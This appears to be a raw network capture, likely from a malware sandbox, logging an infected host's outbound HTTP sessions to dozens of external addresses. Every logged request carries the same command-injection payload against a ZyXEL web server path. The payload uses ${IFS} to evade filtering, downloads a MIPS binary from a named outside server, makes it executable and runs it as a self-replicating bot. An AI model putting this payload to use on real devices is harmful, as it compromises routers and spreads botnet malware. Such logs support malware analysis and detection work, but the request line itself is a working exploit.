                                                Jan 12, 2024 18:16:14.230319023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2188192.168.2.2335892217.45.147.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.230356932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2189192.168.2.234185864.204.24.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.230403900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2190192.168.2.234353248.156.250.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.230448008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2191192.168.2.2343368192.64.250.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.230468988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2192192.168.2.2353178126.126.187.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.230530977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2193192.168.2.2342036192.153.196.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.230573893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2194192.168.2.235499020.238.68.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.230597973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2195192.168.2.2339850139.16.236.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.230644941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2196192.168.2.234568844.219.97.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.230686903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2197192.168.2.2344480110.45.242.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.230720997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2198192.168.2.2337428161.252.10.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.230747938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2199192.168.2.2341928183.165.19.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.230781078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2200192.168.2.2353124213.229.99.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.230829000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2201192.168.2.2346408189.57.44.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.230863094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2202192.168.2.2351186177.160.191.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.230977058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2203192.168.2.2355150104.98.123.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.231014967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2204192.168.2.235100290.18.0.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.231056929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2205192.168.2.234320081.96.155.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.231106043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2206192.168.2.2348218165.35.251.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.231161118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2207192.168.2.233906063.41.249.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.231177092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2208192.168.2.2353042208.25.98.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.231203079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2209192.168.2.233635850.208.4.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.231250048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2210192.168.2.2337418111.106.70.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.231297970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2211192.168.2.234905068.58.204.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.231343985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2212192.168.2.236094057.78.173.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.231384993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2213192.168.2.2339958120.242.157.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.231422901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2214192.168.2.2352112209.201.162.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.231470108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2215192.168.2.2335078196.107.130.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.231529951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2216192.168.2.2353488167.129.109.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.231554985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2217192.168.2.2358924219.172.57.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.231585979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2218192.168.2.235600042.94.24.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.231616974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2219192.168.2.234397298.114.161.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.231637955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2220192.168.2.2337372191.82.73.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.231677055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2221192.168.2.235357465.150.95.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.231714964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2222192.168.2.2354092124.143.229.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.231745005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2223192.168.2.2353248157.191.0.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.231770992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2224192.168.2.2342468167.2.215.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.231817007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2225192.168.2.2340064144.15.61.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.231846094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2226192.168.2.2342840137.50.211.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.231894016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2227192.168.2.234297870.48.198.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.231933117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2228192.168.2.234508267.82.96.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.231976032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2229192.168.2.2341502105.40.198.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.232001066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2230192.168.2.234202288.172.195.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.232049942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2231192.168.2.233805860.243.44.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.232084990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2232192.168.2.2347356205.238.147.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.232121944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2233192.168.2.234261867.157.22.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.232162952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2234192.168.2.2353628106.179.136.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.232287884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2235192.168.2.2337534177.194.158.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.232306004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2236192.168.2.2357384117.233.63.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.232347012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2237192.168.2.2349280185.153.188.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.232369900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2238192.168.2.234234452.169.118.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.232404947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2239192.168.2.2338756222.166.92.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.232458115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2240192.168.2.234848871.171.235.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.232485056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2241192.168.2.2344512100.3.31.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.232533932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2242192.168.2.2339444202.148.71.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.232574940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2243192.168.2.2350190128.195.27.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.232603073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2244192.168.2.235223835.186.106.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.232655048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2245192.168.2.2333064123.49.222.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.232712030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2246192.168.2.2341748180.44.110.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.232737064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2247192.168.2.2357632100.198.155.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.232796907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2248192.168.2.233994036.121.13.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.232820988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2249192.168.2.2334144206.200.194.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:14.232844114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2250192.168.2.2354386134.93.55.181443
                                                TimestampBytes transferredDirectionData
